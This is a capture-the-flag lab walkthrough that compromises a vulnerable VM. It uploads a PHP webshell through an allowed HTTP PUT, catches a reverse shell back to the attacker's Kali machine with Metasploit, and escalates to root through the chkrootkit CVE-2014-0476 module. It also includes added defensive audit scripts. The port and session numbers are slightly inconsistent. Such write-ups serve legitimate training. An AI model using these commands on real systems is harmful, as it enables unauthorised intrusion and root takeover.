This machine can be downloaded from:
Set the Network adapter to NAT if you are using VMware.
Find the target's local IP with the netdiscover command:
It may differ in your lab.
Scan the target IP with nmap's default options:
nmap -A -vv -T4 192.168.236.136
We find two open ports: 22/tcp and 80/tcp.
Scan all TCP ports; for convenience we can use zenmap:
Type zenmap to open zenmap tool
Type the IP in target: 192.168.236.136
Choose from profile: Intense scan, all TCP ports
As shown in the screenshot:
nmap -p 1-65535 -T4 -A -v 192.168.236.136
Scan all UDP ports
The UDP scan found no useful ports, so we go back to the TCP results.
Since port 80 is open, we browse to it.
We run nikto -h to scan the web server and look for directories on the host:
nikto -h 192.168.236.136
Since nikto gives no useful result, we run dirbuster with the medium word list.
dirbuster, a different tool for finding directories:
dirbuster finds a “test” directory; let’s open it in the browser.
Let’s analyze the page and view its source:
Nothing useful. Next we check which HTTP methods the server allows, using either Burp Suite or curl to send an OPTIONS request:
Since PUT is allowed, we can upload our shell either via Burp Suite or via nmap.
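The OPTIONS check above is also the check a defender runs against their own server. The script below is an added example, not part of the original walkthrough: it extracts the Allow header from an OPTIONS response and flags every method that lets a client write content (PUT, DELETE, PATCH and the WebDAV write methods), which none should be enabled on a static directory like /test/. The target URL in the comment is the lab IP from this page; the sample response is constructed, not captured from the box.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): audit the HTTP methods a web
# directory advertises in its OPTIONS response and flag the ones that let a
# client modify server-side content.

# risky_methods VALUE: VALUE is an Allow header such as "GET,HEAD,POST,OPTIONS,PUT,DELETE".
# Prints the write-capable methods, space separated (empty if there are none).
risky_methods() {
    out=""
    # normalise to upper case and split on commas so the for loop can word-split
    for m in $(printf '%s' "$1" | tr 'a-z' 'A-Z' | tr ',' ' '); do
        case "$m" in
            PUT|DELETE|PATCH|MOVE|COPY|MKCOL|PROPPATCH)
                out="${out:+$out }$m" ;;
        esac
    done
    printf '%s\n' "$out"
}

# allow_header: read a raw HTTP response on stdin and print the Allow header value.
allow_header() {
    tr -d '\r' | awk 'tolower($1) == "allow:" { sub(/^[^:]*:[ \t]*/, ""); print; exit }'
}

# check_options URL: live check with curl (needs network access). Returns 1 when
# any write method is advertised. Example, this walkthrough's target:
#   check_options http://192.168.236.136/test/
check_options() {
    allow=$(curl -s -i -X OPTIONS "$1" | allow_header)
    flagged=$(risky_methods "$allow")
    if [ -n "$flagged" ]; then
        printf 'RISK %s advertises write methods: %s\n' "$1" "$flagged"
        return 1
    fi
    printf 'OK   %s allows only: %s\n' "$1" "${allow:-<no Allow header>}"
}

# Constructed sample response (not captured from the lab box) so the parser can be
# exercised offline; a server that accepts PUT answers OPTIONS in this shape.
SAMPLE_RESPONSE='HTTP/1.1 200 OK
Allow: GET,HEAD,POST,OPTIONS,PUT,DELETE
Content-Length: 0

'

# demo_flagged: run the parser over the constructed response -> "PUT DELETE"
demo_flagged() {
    risky_methods "$(printf '%s' "$SAMPLE_RESPONSE" | allow_header)"
}

if [ -n "${1:-}" ]; then
    check_options "$1"
fi
```

Any method the script flags should be disabled in the web server configuration for that directory (on Apache httpd, for instance, a `<LimitExcept GET POST HEAD>` block with `Require all denied`; the page does not name the server software, so this is only an illustration), and the check should be repeated after the change.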
Let us prepare the shell first.
I use the ready-made shell that ships with Kali:
Copy the shell and rename it shell.php:
cp /usr/share/webshells/php/php-backdoor.php /root/shell.php
Edit shell.php so that the IP is the Kali IP and the port is 443 (because 4444 isn’t working).
nmap -p 80 192.168.236.136 --script http-put --script-args http-put.url='/test/shell.php',http-put.file='shell.php'
Now we have to set up a listener, in one of two ways: nc -lvp 443 or Metasploit. I prefer Metasploit for the privilege escalation later.
We use the payload php/reverse_php because we generated a plain shell, not a meterpreter, and that works for me.
Set the local host (Kali IP) and port (443) as we did in the shell previously.
Then we type exploit -jz to run the session in the background.
set payload php/reverse_php
set LPORT 442
Then we trigger the shell by opening it in the browser:
Finally we got a user shell!
But only as the unprivileged user www-data.
For privilege escalation, we first check the running processes for ones with root privileges:
We see that chkrootkit runs with root privileges:
drwxr-xr-x 2 john john 4096 Apr 12 2016 chkrootkit-0.49
Searching Google for vulnerabilities, we discover that chkrootkit is affected by CVE-2014-0476.
This could allow me to escalate my privileges with a Metasploit module.
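From the defender's side, the condition that makes this box exploitable is simple: a chkrootkit release older than 0.50 (the fix for CVE-2014-0476) is run with root privileges. The script below is an added example, not part of the original walkthrough: it takes the version from the directory name seen in the ls output above (chkrootkit-0.49), checks whether it predates 0.50, and scans ps output for chkrootkit running as root. The ps lines and the path in them are constructed for the demonstration, not captured from the lab machine.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): audit a host for the chkrootkit
# weakness used on this machine. CVE-2014-0476 is fixed in chkrootkit 0.50; the
# risk is an older release executing as root (e.g. from a root cron job), which
# lets a local unprivileged user have code run as root.

# chkrootkit_affected VERSION: exit 0 when VERSION is below 0.50.
# Accepts "0.49" or a directory name such as "chkrootkit-0.49".
chkrootkit_affected() {
    ver=${1#chkrootkit-}
    major=${ver%%.*}
    rest=${ver#*.}
    minor=${rest%%.*}
    [ "$major" -eq 0 ] && [ "$minor" -lt 50 ]
}

# root_chkrootkit_jobs: read `ps aux`-style output on stdin, print lines where
# chkrootkit runs under the root account.
root_chkrootkit_jobs() {
    awk '$1 == "root" && /chkrootkit/'
}

# audit_chkrootkit VERSION: combine both checks; ps output is read from stdin.
# Returns 1 when the installed release is affected.   usage: ps aux | audit_chkrootkit chkrootkit-0.49
audit_chkrootkit() {
    status=0
    if chkrootkit_affected "$1"; then
        echo "VULNERABLE: $1 predates 0.50 (CVE-2014-0476); upgrade chkrootkit"
        status=1
    else
        echo "ok: $1 is not affected by CVE-2014-0476"
    fi
    jobs=$(root_chkrootkit_jobs)
    if [ -n "$jobs" ]; then
        echo "chkrootkit runs with root privileges:"
        echo "$jobs"
        if [ "$status" -eq 1 ]; then
            echo "-> local users can gain root; disable the root job until chkrootkit is upgraded"
        fi
    fi
    return "$status"
}

# Constructed ps output (not captured from the lab box); the chkrootkit path is a placeholder.
SAMPLE_PS='USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 24000 2000 ? Ss 10:00 0:01 /sbin/init
root 987 0.0 0.0 4400 800 ? S 10:05 0:00 /bin/sh /path/to/chkrootkit-0.49/chkrootkit
www-data 1201 0.0 0.2 30000 5000 ? S 10:06 0:00 /usr/sbin/apache2 -k start'

# count_root_chkrootkit: number of root-owned chkrootkit processes in the sample -> 1
count_root_chkrootkit() {
    printf '%s\n' "$SAMPLE_PS" | root_chkrootkit_jobs | wc -l | tr -d ' '
}

# demo_audit: offline run with the version seen on this box and the constructed ps output.
demo_audit() {
    printf '%s\n' "$SAMPLE_PS" | audit_chkrootkit chkrootkit-0.49
}
```

The remediation the audit points at is the same one that closes this path on the lab box: upgrade chkrootkit to 0.50 or later, and until then do not let a scheduled job run the old release as root.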
Enter the following commands, as shown in the image, to load the exploit/unix/local/chkrootkit module, then set session 1 and an arbitrary lport such as 8080, and run the module.
For me, I set session 3 because I had already opened sessions 1 and 2.
Check the lport with the options command:
Then type run.
Session 4 opened, in my case.
To see the privileged account:
Now we are root!
Open the 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt file for the final flag:
I hope you enjoyed it!
Contact me on Twitter: